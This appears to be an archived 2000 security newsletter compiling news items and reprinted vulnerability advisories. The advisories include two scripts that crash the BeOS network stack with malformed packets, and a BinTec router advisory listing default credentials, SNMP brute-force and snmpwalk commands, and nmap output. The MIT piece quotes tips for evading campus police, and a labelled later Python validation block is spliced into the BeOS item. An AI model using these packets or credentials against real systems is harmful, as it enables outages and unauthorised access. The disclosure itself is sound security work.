With students routinely ignoring ''no entrance'' signs, groping their way through unlit pipe rooms, boiler tunnels, and high-voltage areas meant only for specially trained maintenance crews, safety has long concerned administrators. But the culture of hacking recently has come under increased scrutiny.

About 3 a.m. on a Sunday morning in November, an 18-year-old woman plunged 96 feet down a chimney. The freshman from Pennsylvania, whose name MIT won't release, is recovering from major spinal cord injuries after falling off the roof of the Sloan School of Management building.

While administrators say the student's injury is the worst hacking accident in memory, they know the college was very close to having a fatality - and they say they're doing everything in their power to stop it.

''One injury is one injury too many,'' Bacow said. ''We took this very seriously. She could have died - easily. She was lucky.''

Even with fines of up to $500 for trespassing, improved locks and alarm systems, and constant admonishing by administrators, MIT hackers are not daunted. If anything, they say, they see the obstacles as a challenge to be overcome.

''A lot of hacking is about creativity, finding a way around a locked door or something,'' said a 22-year-old senior majoring in biology, who used to hack and asked that she not be identified. ''Hackers are generally students who question authority and don't pay attention to rules.''

Yet hackers insist they consider safety paramount.
Before taking out novices, usually recently recruited freshmen, they pass out laminated yellow cards titled, ''Hacking Ethics.'' The cards are also used as a way to open doors.

The pithy precepts include: ''Don't drink and hack;'' ''Don't hack alone;'' ''Leave no permanent damage;'' ''Be subtle - leave no evidence that you were there;'' and contrarily, ''Don't steal anything, but if you must borrow something, remember to return it - perhaps leave a note saying when it will be returned.''

But risks rise when hackers obey their 11th Commandment: Don't Get Caught.

According to ''A Brief Guide to Hacking,'' part of a pamphlet published by MIT's Technology Communication Association and circulated to incoming freshmen, hackers ''shalt honor [the commandment] and keep it wholly.''

After detailing specific evasion tactics - such as, ''always have two ways to run,'' or when fleeing, ''change floors often'' - the guide offers up these alibis if caught: ''Is this the way to Baker House?'' or ''Where's the nearest bathroom?''

Rarely, however, do students get caught in such a bind. According to MIT campus police, fewer than a dozen students a year are cited for hacking. Yet on any given night, as many hackers may be trolling through the Earth, Atmospheric, and Planetary Sciences building or the domes towering above the Infinite Corridor.

''It's a difficult thing to prevent,'' said Anne Glavin, chief of MIT's police force. ''First, this subculture is made up of secret associations, and they're not exactly inviting us in as guest speakers. The other thing is these are some of the brightest students. Staying ahead of them is a challenge. I mean, they are the ones who are going to be building the security systems in the future.''

The phenomenon of students scoping steam tunnels or climbing through air ducts for fun reveals the peculiar environment of grouping some of the nation's smartest science-oriented students, administrators and alumni say.
At the elite institution, where many of the students grow up taking pleasure more from solving a quadratic equation than in things like watching Sunday football, students often are eager to craft their own brand of entertainment. Throw in a dollop of curiosity and a bent toward ingenuity and you come up with students interested in hacking, according to Jeff Bigler, the former president of MIT Spelunkers club and now an alumnus who helps chronicle hackers' practical jokes.

''Really, what it comes down to is it's a way to hang out, and beats drinking beer and bad music,'' Bigler said. ''It's just exploring, hanging out together and having fun. It's like an outing club.''

@HWA

238.0 ISN:US Census tests security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.fcw.com/fcw/articles/2000/0327/web-1census-03-27-00.asp

Census tests security

By Judi Hasson
03/27/2000

The Census Bureau has hired a company to try to break into its Internet site and brought in the super-secret National Security Agency to test Census security systems.

Census officials said they are certain the data is safe but want to make sure there are no vulnerable spots.

"Every day, people are scanning our ports. It's not just our site. It's any site," said J. Gary Doyle, who is responsible for systems integration at the Census Bureau.

Among the steps that the Census Bureau has taken to protect the decennial count:

* Hiring the technology firm Science Applications International Corp. to try to break into the Census Internet site, where respondents can file online. SAIC began working last week, and there have been no reports of successful entry into the site.
* Enlisting NSA to make sure the site is secure.

* Erecting firewalls to prevent penetration. Among the precautions: prohibiting e-mail from entering the site unless there is a specific address on it and barring outside computers from dialing up the census computer in the building.

* Encrypting all census data from the time it leaves a data scanning center via a secure telephone line until it arrives at the Census computer center in Bowie, Md.

* Making three copies of the data and storing it in different vaults.

* Providing backup systems at the Bowie computer center, including generators and air conditioners.

The Census Bureau's precautions have gotten high marks from security experts inside and outside government.

"Census is using all of the proper security practices," said Richard Smith, vice president of federal operations at Internet Security Systems Inc. "I would guess the likelihood of someone getting in is small."

@HWA

239.0 ISN:Visa program targets online fraud
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: darek.milewski@pl.pwcglobal.com

Visa program will target online fraud
By Rachel Konrad
Staff Writer, CNET News.com
March 24, 2000, 1:10 p.m. PT
URL: http://news.cnet.com/category/0-1007-200-1583717.html

Online retailers will soon receive a list of formal recommendations from Visa aimed at helping merchants crack down on fraud.

Visa's "best-practices" guide, which will be released within the next several weeks, will be similar to those the credit card giant has created for catalog companies that accept credit cards by mail or telephone without signatures.
But the newest guide will target e-commerce companies for the first time, with tips on how to minimize hacker attacks on databases and spot potentially fraudulent orders before products are shipped.

"Internet merchants haven't always come out of the old catalog business, and sometimes they have little experience in business," said Dave Richey, vice president for card operations at Visa. "They're often new and often focused on IPOs and other stuff. Communication between merchant and cardholder is key in avoiding misunderstandings."

For some e-tailers, Visa's security tips could be considered a case of "better late than never": Credit card fraud has marred several high-profile and relatively established online companies in recent months.

Expedia, Microsoft's online travel affiliate, announced earlier this month that it will record a fiscal third-quarter charge of $4 million to $6 million to cover the cost of fraudulent transactions on its Web site. The Bellevue, Wash.-based company said stolen credit cards were used to book travel reservations.

In January, nearly 350,000 credit card numbers were stolen from music site CD Universe and posted online. A hacker going by the name "Maxus" claimed to have the numbers and tried to extort $100,000 from the Web site.

The focus on credit card fraud coincides with intense scrutiny of e-commerce companies by Wall Street investors, many of whom worry that security breaches could dent revenue.

Unlike credit card transactions at brick-and-mortar companies, in which the bank that issued the card is usually liable for fraudulent transactions, online merchants are typically forced to cover the losses. The financial institution that issues a credit card assumes liability in about 75 percent of all fraudulent transactions, according to John Shaughnessy, senior vice president for risk management at Visa.
But in "card-not-present" transactions--when transactions happen by mail, telephone or Internet and no signatures are obtained--merchants assume liability for roughly 90 percent of fraudulent transactions.

Although it's impossible to quantify how much money online merchants have lost to fraudulent charges, experts say the total as a percent of revenue is anywhere from 1 percent to 30 percent, depending on the retailer and industry. In general, computer and electronics vendors are more at risk for fraud than vendors of less-expensive items, such as books, videos or CDs.

"Security is going to be the critical issue," said Ben Sim, an expert on e-commerce for New York-based C.E. Unterberg Towbin. "A lot of these merchants don't understand the implications of fraud, and they're using home-grown solutions that simply don't work. If you're getting someone from Romania ordering $50,000 of books, the fraudulent transaction's not going to happen. But thieves are getting much more sophisticated, and merchants' security systems aren't necessarily getting better."

According to an Unterberg Towbin study in 1998, more than 50 percent of disputed (or potentially fraudulent) charges at the Visa European division came from Internet transactions. However, Net transactions represented only 2 percent of the division's total transaction volume.

Although many e-commerce executives downplay fraud, their attorneys and accountants don't.

"Security breaches that result in access to confidential information could damage our reputation and expose us to a risk of loss or liability," music retailer CDNow stated in a 10K filed with the Securities and Exchange Commission in 1998. "We may be required to make significant expenditures and expend considerable personnel effort to protect against security breaches or remedy problems caused by these breaches. We cannot assure that our security measures will prevent such breaches."
Other companies are even more blunt: "We cannot assure you that our security measures will prevent security breaches, and such breaches could expose us to operating losses, litigation and possible liability," read a 10Q filed by Egghead.com last November.

Amazon.com stated in a fall 1999 10Q filing: "Computer viruses, physical or electronic break-ins, and similar disruptions could cause system interruptions, delays and loss of critical data and could prevent us from providing services and accepting and fulfilling customer orders.

"Although we have developed systems and processes to mitigate fraudulent credit card transactions, failure to prevent such fraud may impact our financial results."

Tom Holland, director of fraud detection and prevention for Amazon, said such warnings are worst-case scenarios, not daily concerns.

"Amazon's fraud losses in comparison to sales revenues--it's minuscule," Holland said. "I can't tell you the dollar figure. It's large, but as a percentage of sales, it's insignificant."

Holland said the company is continually upgrading its security system and cooperating with law enforcement to tackle fraud. Amazon and the sheriff of Fairhope, Ala., just completed a case in which a ring of thieves were using card numbers secured from an online "hack shack" of credit card numbers to buy books.

"They'd go to a house for sale, rip down the for-sale sign, and have deliveries go there," Holland said. "They took us for $3,000, but we're getting it all back."

Although online credit card fraud can damage retailers, security experts say, Internet transactions are extremely safe for consumers. Consumers whose cards are used fraudulently online rarely are responsible for the bills because they don't sign a receipt. In the physical world, consumers must pay up to $50 of fraudulent transactions if they fail to report a stolen card or carelessly distributed credit card information.
"The people who end up eating it are the merchants," said Paul Wasserman, chief executive of Internet shopping portal Ebates.com and a former high-tech crime prosecutor in Silicon Valley. "If you're a merchant exercising due diligence, you're supposed to be off the hook. But the reality is that most of the financial institutions don't let them off."

Many e-commerce executives complain of an adversarial relationship with issuing banks. Holland said that often, when Amazon calls banks to verify addresses, the company doesn't get help. "They can be blasé," Holland said of the issuing banks. "The e-commerce companies don't get any respect. We're Rodney Dangerfield."

ISN is sponsored by SecurityFocus.com

@HWA

240.0 ISN:GAO lists security bargains
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.fcw.com/fcw/articles/2000/0327/web-cheap-03-30-00.asp

BY Diane Frank
03/30/2000

Agencies can cut their information systems security risks with low-cost and no-cost solutions, federal experts told Congress Wednesday.

The General Accounting Office listed six steps that agencies can take to immediately cut down on their security risks:

* Increase security awareness throughout the organization.
* Ensure that existing controls are operating effectively.
* Ensure that software patches are up-to-date.
* Use automated scanning and testing tools to quickly identify vulnerabilities.
* Expand the use of best practices throughout the agency.
* Ensure that the most common vulnerabilities are addressed.

In its security audits of agencies, including the departments of Defense and Veterans Affairs, GAO found that security controls are in place but that those controls are not being used correctly, said Jack Brock, director of governmentwide and defense information systems at the General Accounting Office's Accounting and Information Management Division.
"Agencies are spending money for tools, but they're not using those tools," Brock testified before the House Government Reform Committee's Government Management, Information and Technology Subcommittee. "Tools are present, but they're not turned on, they're not monitored, you're not sure if they're working or not."

One agency that has incorporated many of GAO's low-cost solutions into its agencywide security policy is NASA, which has made many improvements in security since its GAO audit in 1998, Brock said. The agency has bought commercial off-the-shelf vulnerability analysis and scanning tools, but it is augmenting them with freeware and shareware tools from the Internet. NASA also has developed and distributed a list of its top 50 vulnerabilities and has built those into auditing tools at NASA centers so that they automatically scan for those weaknesses, testified David Nelson, NASA's deputy chief information officer.

Related link: Text of GAO's Congressional testimony on Wednesday
http://www.gao.gov/new.items/ai00135t.pdf

*-------------------------------------------------*
"Communications without intelligence is noise; Intelligence without communications is irrelevant."
Gen. Alfred. M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions
http://www.c4i.org
*-------------------------------------------------*

@HWA

241.0 ISN:DeBeers leaks customer info
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://news.cnet.com/news/0-1007-200-1639327.html?tag=st.ne.1002.thed.1007-200-16393271007-200-1639327

By Stefanie Olsen
Staff Writer, CNET News.com
April 4, 2000, 4:45 p.m. PT

On the Web, diamonds can be a spammer's best friend. About 35,000 customer email and home addresses were exposed on adiamondisforever.com, an informational site about diamonds sponsored by De Beer's, CNET News.com has learned.
Chad Yoshikawa, a Bay Area consultant, stumbled across the security hole today while searching for his home address through a search engine. The results turned up a little more than he bargained for. A Web page he found, pulled from the De Beer-sponsored site, lists the names, phone numbers, home and email addresses of people registered with the site, along with his own. Yoshikawa, who said his wife entered a diamond contest through the site, contacted a site administrator immediately because "it didn't look like they were too on top of things because it was hard to find the privacy policy." Jim Greene, system administrator for hosting company Luminant, replied in the email to Yoshikawa: "We have investigated and fixed the problem with the site. This area is not active on the site any longer." The security breach resembles several related "data spills" from Web sites. Last year, Butterball published the names and addresses of people who signed up to receive recipes via an online newsletter. Nissan also exposed a list of more than 24,000 email addresses of its potential buyers last year. "This kind of occurrence is all too frequent. (But) the De Beer's seems especially troublesome because it suggests access to high-net individuals," said Jason Catlett, president of Junkbusters, an online advocacy group. "Who knows how many people have noticed or downloaded the list before it came to the attention of the media." Catlett said. Greene said Yoshikawa and CNET News.com were the only ones to spot the file. "We have looked into the server logs and see no indications that anyone besides yourself and someone coming from C-Net accessed the files," he wrote. Adiamondisforever.com, which launched in November 1996, is part of The Diamond Information Center (DIC), a marketing service for De Beer's, one of the largest diamond producers and marketers in the world. 
The site's privacy policy stipulates that the company does not "make available the email addresses of those who access our site to other organizations or companies."

@HWA

242.0 ISN:Cybersleuths want to hack bill of rights
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/04/05/ED11338.DTL&type=tech_article

JAMES P. PINKERTON, Newsday
Wednesday, April 5, 2000
2000 San Francisco Chronicle

More than ever before, Americans are exercising their unalienable right to life, liberty and the pursuit of capital gains. But what happens when liberty jeopardizes life -- or the Dow Jones average? And what happens when the government jeopardizes liberty?

On Tuesday, Sen. Jon Kyl, R-Ariz., convened the Senate Judiciary Subcommittee on Technology, Terrorism and Government Information to make the case for new legislation to protect the nation's ``information infrastructure.''

And so began a familiar Washington ritual: Friendly lawmaker invites friendly bureaucrat to a hearing. Soon, a new law emerges that gives political credit to the lawmaker and a bigger budget to the bureaucrat.

Kyl began the show with a declaration that ``denial of service'' hacker attacks on companies such as eBay, Yahoo and CNN should ``serve as a wake-up call about the need to protect our critical computer networks.'' Kyl added that ``the attacks contributed to a 258-point drop in the Dow Jones Industrial Average and halted a string of three days of consecutive record-high closes of the technology-laden Nasdaq Composite Index.''

To deal with this problem, Kyl and Sen.
Charles Schumer, D-N.Y., have co-sponsored S. 2092, which would modify the federal government's ``trap and trace'' authority, so that law enforcers would no longer need to obtain a search warrant in every jurisdiction through which a cyber- attack traveled. The first ``witness'' was FBI Director Louis Freeh. After praising Kyl and his legislation, he reminded his audience of how much the FBI was already doing to combat the scourge of cyber-crime. Freeh then used the forum to outline the FBI's entire cyber-agenda, covering everyone from virus-writers and intellectual property thieves to the ``Internet Black Tigers,'' a group ``reportedly affiliated with the Tamil Tigers'' of Sri Lanka. He further noted that unchecked Net-related stock fraud costs investors $1 million an hour. Only two more witnesses came after Freeh. One was Richard D. Pethia, who directs a federally funded cyber-security center within the Software Engineering Institute at Carnegie Mellon University in Pittsburgh. Not surprisingly, Pethia was 100 percent behind the joint Kyl-Freeh effort. The other witness was Harris N. Miller, president of the Information Technology Association of America, a Washington-based trade association. Miller was supportive but ambivalent; his worry seemed to be that high-tech trade secrets would spill into -- and then out of -- Uncle Sam's databases. But the real opposition to the Senate bill wasn't heard from because it wasn't invited to testify. One likely opponent is the Electronic Privacy Information Center, a Washington-based cyber-liberties group. ``This is very much a process being driven by the law-enforcement community,'' lamented Mark Rotenberg, the group's director. Another non-invitee was Solveig Singleton, director of information studies at the Cato Institute, a libertarian think tank in Washington. ``Law enforcement views the Fourth Amendment as the problem,'' she said. 
That's the piece of the Bill of Rights that protects ``persons, houses, papers and effects against unreasonable searches and seizures'' -- with no mention of e-mail. And so now, Singleton observed, the FBI wants to force manufacturers to ``build surveillance into technology,'' all but eliminating the need for search warrants.

The dangers that Kyl and Freeh described are real, but so is the danger of a government's habitually stomping on privacy rights. History proves that basic rights are unalienable only when those who might alienate them are watched.

@HWA

243.0 ISN:Third laptop gets lifted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.the-sun.co.uk/news/5631664

By JOHN KAY

A SENIOR Army officer has had a laptop computer stolen from under his nose - the THIRD theft of sensitive files in a month.

The 50,000-a-year (U.K.P.) lieutenant colonel fell victim to an opportunist thief at Heathrow Airport.

Military top brass admitted last night the incident was "incredibly embarrassing". And they said that the soldier was facing an internal disciplinary probe.

The robbery followed the loss of two security service laptops - one from an MI5 agent at a London Tube station and one from a drunken MI6 officer.

After those thefts were revealed exclusively by The Sun, all Government departments were ordered to tighten precautions against crooks out to snatch computers.

[...]

@HWA

244.0 ISN:Government suck rocks at busting computer criminals
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://news.cnet.com/news/0-1005-200-1648223.html

By The Associated Press
Special to CNET News.com
April 6, 2000, 10:05 a.m.
PT STANFORD, Calif.--Threats from cyberterrorists have become almost routine at Oracle, the leading developer of database software. Last month, someone in Sudan tried to blackmail the Redwood Shores, Calif.-based company with a threat to break into its system unless it paid an undisclosed sum of money. A clear case for the FBI? Not at Oracle--or at hundreds of other high-tech victims of Internet cyberstalking. "We've notified them of a couple of threats, but we didn't expect them to take any action," said Bill Maimone, Oracle's vice president of server technologies. "It seems so unlikely that they'd be able to do something." As high-tech executives know, the Justice Department lacks the staff to investigate and prosecute most hackers. Many companies also are reluctant to undergo government scrutiny; they've got too many secrets. As a result, cybercriminals are breaking into or paralyzing Web sites with little fear of retribution, costing the industry hundreds of millions of dollars. At a Stanford University Law School conference on cybercrime yesterday, Attorney General Janet Reno pleaded for greater cooperation between the private and public sectors. "It seems to me that we all have a common goal--to keep the nation's computer network secure, safe and reliable," Reno told the assembled CEOs and prosecutors. Many company leaders were unconvinced. "High-tech businesses know they can't count on the Justice Department to handle their complaints," said John Palafoutas, a senior vice president of the American Electronics Association. "They know they must take care of their own security." For the past four years, the Clinton administration has asked Congress for additional staff to prosecute computer crime. To date, the answer has been a consistent refusal. There was just one cybercrime prosecution for every 50 private industry complaints in 1998, according to the latest Justice Department figures. 
"We're only able to respond to a limited number of the complaints we receive because we're starved for resources," said Associate Deputy Attorney General John Bentivoglio. While funding for prosecutors remains static, computer crime has quadrupled over the past three years, according to a survey by the FBI and San Francisco's Computer Security Institute. Of the hacking victims--most often corporations and government agencies--75 percent said it cost an average of $1 million per intrusion to investigate, repair and secure their systems. Corporations spent $7.1 billion in 1999 on security to protect themselves against cyberattacks, and the bill could reach $17 billion by 2003, according to Internet analysts at Aberdeen Group in Boston. Hackers know authorities are overwhelmed. Two months have passed with no arrests in the Feb. 8 electronic assault that crippled Web sites at 10 major computer companies, including Silicon Valley powerhouses eBay, Yahoo and E*Trade. eBay, an Internet auction site with more than 4.1 million items up for sale at any given time, fights a constant battle against hacking, fraud and illegal deals. "We only take the most serious matters to the FBI. They investigated a few, but there haven't been any prosecutions," said eBay's general counsel, Robert Chesnut. "If the government is going to come out and vow action in these sorts of cases, they need to provide resources, not just the promises." Companies such as eBay and Oracle rely on the help of private consultants to combat hackers--a decision that also helps keep their problems from being publicized. "Information-sharing is a risky proposition with less than clear benefits," said Harris Miller, president of the Information Technology Association of America. "Companies are understandably reluctant to share sensitive proprietary information about prevention practices, intrusions and actual crimes with either government agencies or competitors." 
@HWA

245.0 CanSecWest/core00 Canadian Security Conf
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Unfortunately it's out west and not here (southern Ont/Toronto); it's what I was hoping to achieve with the failed CanCon (maybe we'll try it again with better planning this time and like oh I dunno SPONSORS? money sorta helps heh.) anyway ...I know Dragos has promo'd this to death but here's the details :)

April 7, 2000

CanSecWest/core00

The CanSecWest/core2000 Conference is being held May 10-12th in Vancouver, BC, Canada. Featured speakers include Ken Williams, from Ernst and Young, rain.forest.puppy from wiretrip.net and Fyodor, the author of nmap, from insecure.org.

http://www.dursec.com/

CanSecWest/core00
May 10th, 11th, 12th, 2000
Vancouver, BC, Canada.

"Every IT/Security person who can attend, should attend. CanSecWest/core00 promises to be the hardest hitting, most informative, and useful network security event ever held in Canada." (Sounds familiar eh?)

CanSecWest is the first in the core00 series of security tutorials. It assumes a basic understanding of computing and is targeted at IT staff and managers who require a "crash" course on advanced computer security. If you administer servers you -need- this knowledge to put yourself on an even footing with your aggressors. Our goal is to arm our attendees with the basic core set of skills to create, defend, and audit secure computer and server installations.
This 2.5 day intensive training seminar will cover the most important modern security issues facing e-commerce, networking, and system administration with expert talks from some of the most noted, famous and knowledgeable network security "sensei" in the world. This is your training academy for dealing with the network intruders trying to prey on your computer - maybe even right now. "Find out how they break in, how to stop them, and what they can do to try to evade you."

The core00/CanSecWest conference will run on May 10-12, 2000*. The conference will be at the Robson Conference Center which is situated under the Vancouver Art Gallery next to the Law Court gardens in downtown Vancouver, BC, Canada. The seminar will be in an auditorium setting with live highspeed internet access, and an adjoining lunch and display room. The center itself is situated in the heart of downtown Vancouver, next to major hotels, shopping, Stanley Park and several major transportation nexuses. Skiing or snowboarding at the world-renowned Whistler resort is a 60 minute drive from downtown.

Our objective is to pack the most comprehensive overview of security into 2.5 days we can. At the conclusion of this course attendees will leave with a strong working base of critical security knowledge that can be applied to their day-to-day work immediately.

"The core00"

The first day of introductory training will give the attendee the background on terminology and technology to understand and effectively learn from the security masters speaking during the second day. The overall theme is similar to a martial arts school: the first day is the basics and the second is notable lectures from "Sensei".

Noted speakers include:

Ron Gula - Network Security Wizards
Famous ex-U.S. government computer security analyst, who founded Network Security Wizards and authored the Dragon intrusion detection system.
Ron will discuss intrusion detection sensors, drawing upon his large base of practical experience in the area.

Ken Williams - Ernst & Young
The creator of famous hacker super-site: packetstorm.securify.com. The infamous "tattooman" from genocide2600 now of Ernst&Young's security team will give some pointers on NT security.

Marty Roesch - www.hiverworld.com
Author of the popular "snort" intrusion detection system and senior software engineer on Hiverworld's "ARMOR" intrusion detection system. He will talk about good ways to "snort" out intruders.

rain.forest.puppy - www.wiretrip.net
Famous security paper author - one of those "he could take over the internet if he felt like it" kind of guys will amaze and amuse with some 0 day exploit training.

Theo DeRaadt - OpenBSD
The leader of the OpenBSD Secure operating system project will talk about securing operating systems.

Fyodor - www.insecure.org
Author of the award winning Nmap Security Scanner. He also maintains the popular Insecure.Org web site, the "Exploit World" vulnerability database, and several seminal papers describing techniques for stealth port scanning and OS detection via TCP/IP stack fingerprinting. Fyodor will demonstrate the use of Nmap to identify subtle security vulnerabilities in a network.

Max Vision - www.maxvision.net - www.whitehats.com
Security consultant and author of the popular ArachNIDS (www.whitehats.com) public intrusion signature database will discuss intrusion forensics, attack fakes, attacker verification, and retaliation. (I thought Max was in trouble with the law ...? - Ed)

Dragos Ruiu - dursec.com
Tutorial author, founder of NETSentry Technology, former MPEG and ATM expert for HP and dursec.com founder; Dragos will be giving the first day's training.
Dragos has instructed tens of thousands of people about digital video and high speed computer networks in highly rated HP training courses delivered in over 60 cities world-wide. A long-time security expert and instructor, his course material will explain this intricate subject through approachable explanations with applications and real-world examples that will help you apply this important knowledge to your computers immediately.

@HWA

246.0 PSS:BeOs Network DoS
~~~~~~~~~~~~~~~~~~~~~~~~~~

Sourced from Packetstorm http://packetstorm.securify.com/

Problem: It is possible to crash the BeOS networking process.

Discussion: The BeOS networking stack crashes when certain malformed packets are sent to it. This document explains two such packets. The first is an IP packet with the protocol field set to TCP. If the IP length field is set to be shorter than 40, it will crash the networking process on reception. Similarly, an IP packet with the protocol field set to UDP and an IP length of less than 28 also crashes the stack. The lengths 40 and 28 correspond with the minimum sizes of the IP and TCP headers, and the IP and UDP headers respectively.

Because the networking stack is a separate process in BeOS, it may be easily restarted after it crashes.

A bug report has been filed with Be and assigned the bug number 20000405-18674. Be has marked the bug as "Will Not Fix" with the comment "The entire networking system will be replaced soon."

This bug was found with the help of the ISIC utility by Mike Frantzen. Two CASL scripts which demonstrate the bug are listed below.

References:
http://www.be.com/ - Be's website. BeOS is available for download free of charge.
http://bebugs.be.com/devbugs/ - Be's bug tracking database.
http://expert.cc.purdue.edu/~frantzen/ - The homepage of the ISIC author.
ftp://ftp.nai.com/pub/security/casl/ - NAI's packet scripting language CASL is available for download free of charge.
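As an added illustration (not from the Packetstorm post or from Be), here are the length sanity checks a receiving IPv4 stack needs so that the two packets described above are dropped instead of crashing anything. The constructed packet builder mirrors the shape of the CASL scripts (ip_hl 5, 10.0.0.1 to 10.0.0.2, a lying ip_length); the byte layout is plain RFC 791 IPv4 and the checksum is deliberately not verified here.

```python
import struct

IPPROTO_TCP = 6
IPPROTO_UDP = 17
IPV4_HDR_MIN = 20          # ip_hl = 5 words

# Smallest legal ip_length for a datagram carrying each transport header:
# IPv4 + TCP = 40 bytes, IPv4 + UDP = 28 bytes, the two thresholds the
# advisory gives for the BeOS crash.
MIN_TOTAL_LEN = {IPPROTO_TCP: IPV4_HDR_MIN + 20, IPPROTO_UDP: IPV4_HDR_MIN + 8}


def check_ipv4(pkt):
    """Return (accepted, reason) for a raw IPv4 datagram.

    These are the checks a stack should run before it hands the packet
    to the TCP/UDP input path and indexes into a transport header.
    """
    if len(pkt) < IPV4_HDR_MIN:
        return False, "buffer shorter than minimal IPv4 header"
    ver_ihl, _tos, total_len, _id, _frag, _ttl, proto, _csum = struct.unpack(
        "!BBHHHBBH", pkt[:12])
    if ver_ihl >> 4 != 4:
        return False, "not IPv4"
    ihl = (ver_ihl & 0x0F) * 4
    if ihl < IPV4_HDR_MIN:
        return False, "ip_hl below 5"
    if total_len < ihl:
        return False, "ip_length shorter than IP header"
    if total_len > len(pkt):
        return False, "ip_length larger than received data"
    needed = MIN_TOTAL_LEN.get(proto)
    if needed is not None and total_len < needed:
        # The exact case the CASL scripts produce: a UDP datagram claiming
        # 27 bytes or a TCP segment claiming 39 bytes.
        return False, "ip_length below transport minimum"
    return True, "ok"


def build_ipv4(proto, ip_length):
    """Constructed test packet with the same shape as the CASL scripts:
    ip_hl=5, 10.0.0.1 -> 10.0.0.2, given protocol and ip_length, zero
    padded so the claimed length is actually present on the wire."""
    header = struct.pack("!BBHHHBBH4s4s",
                         0x45, 0, ip_length, 0, 0, 64, proto, 0,
                         bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return header + b"\x00" * max(0, ip_length - len(header))


if __name__ == "__main__":
    for proto, length in ((IPPROTO_UDP, 27), (IPPROTO_UDP, 28),
                          (IPPROTO_TCP, 39), (IPPROTO_TCP, 40)):
        print(proto, length, check_ipv4(build_ipv4(proto, length)))
```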
Script 1:

#!/usr/local/casl/bin/casl
#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"

srchost = 10.0.0.1;
dsthost = 10.0.0.2;

IPH = copy UDPIP;
IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 27;

packet = [ IPH ];
ip_output(packet);

Script 2:

#!/usr/local/casl/bin/casl
#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"

srchost = 10.0.0.1;
dsthost = 10.0.0.2;

IPH = copy TCPIP;
IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 39;

packet = [ IPH ];
ip_output(packet);

@HWA

247.0 PSS: TESO Security Advisory BinTec router weakness
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sourced from Packetstorm http://packetstorm.securify.com/

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------ TESO Security Advisory 2000/03/30

BinTec router security and privacy weakness

Summary
===================

By using SNMP brute-force techniques for SNMP community names one is able to gain the management accounts' passwords, which are the same as the SNMP community names. Additionally the MIB tree holds security related information which should not be accessible through read-only SNMP. These routers also offer services which can be abused rather easily, like dialing out and getting full line access via a CAPI interface, or a debugging interface which gives you all information which is sent over the BRI lines.
(Those services are open as default and the debugging service is barely documented)

Systems Affected
===================

BinTec ISDN router family

tested:
BIANCA/BRICK-XL
BIANCA/BRICK-XS

Tests
===================

(1) Example system setup for examples given
___________________________________________________________________________

admin  Login Password/SNMP Community   bitkoenig
read   Login Password/SNMP Community   rince
write  Login Password/SNMP Community   guenthi

defaults are: admin/bintec read/public and write/public

(2) Example of Read-Only SNMP output from a BinTec router
___________________________________________________________________________

syslog:

bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.1.12.1
[...]
enterprises.272.4.1.12.1.4.954440111.7.39 = "citykom-muenster: local IP address is 195.202.40.124, remote is 195.202.32.121"
enterprises.272.4.1.12.1.4.954440116.7.40 = "LOGOUT as admin from TELNET 192.168.0.100 at Thu Mar 30 18:15:16 2000"
enterprises.272.4.1.12.1.4.954440685.7.41 = "LOGIN as admin from TELNET 192.168.0.100 at Thu Mar 30 18:24:45 2000"
enterprises.272.4.1.12.1.4.954440692.7.42 = "citykom-muenster: outgoing connection closed, duration 583 sec, 18194 bytes received, 4934 bytes sent, 6 charging units, 0 charging amounts"
enterprises.272.4.1.12.1.4.954440692.7.43 = "ISDN: 30.03.2000,18:15:08,18:24:52,583,18596,5306,134,124,6 Units,O,, 609910,7/0,0,0B,citykom-muenster"
[...]

capi-user-db:

bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.7.8.1
enterprises.272.4.7.8.1.1.7.100.101.102.97.117.108.116.0 = "default"   /* username */
enterprises.272.4.7.8.1.2.7.100.101.102.97.117.108.116.0 = ""          /* password */
enterprises.272.4.7.8.1.6.7.100.101.102.97.117.108.116.0 = 1           /* capi access activated */

(3) Remote CAPI Server on a BinTec router
___________________________________________________________________________

fefe:> ps -elf
[...]
S    0   26     1  28   0  Jan 1  ?   00:00 00:00 vcapid
[...]
Corresponding Port:

bitch:~# nmap -sS -O -p 6000 poor.brick.de

Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
Port    State    Protocol  Service
6000    open     tcp       X11

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=1894 (Medium)
Remote operating system guess: Bintec Brick XS SW Release 4.9.1 ISDN access router

Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds

(4) BrickTrace Server on a BinTec router:
___________________________________________________________________________

fefe:> ps -elf
[...]
S    0   24     1  28   0  Jan 1  ?   00:04 00:01 traced
[...]

Corresponding Port:

bitch:~# nmap -sS -O -p 7000 poor.brick.de

Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
Port    State    Protocol  Service
6000    open     tcp       afs3-fileserver

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=1894 (Medium)
Remote operating system guess: Bintec Brick XS SW Release 4.9.1 ISDN access router

